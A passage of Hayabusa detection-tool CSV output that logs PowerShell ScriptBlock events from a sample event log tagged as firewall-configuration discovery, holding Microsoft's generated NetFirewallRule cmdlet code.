(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', 
Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 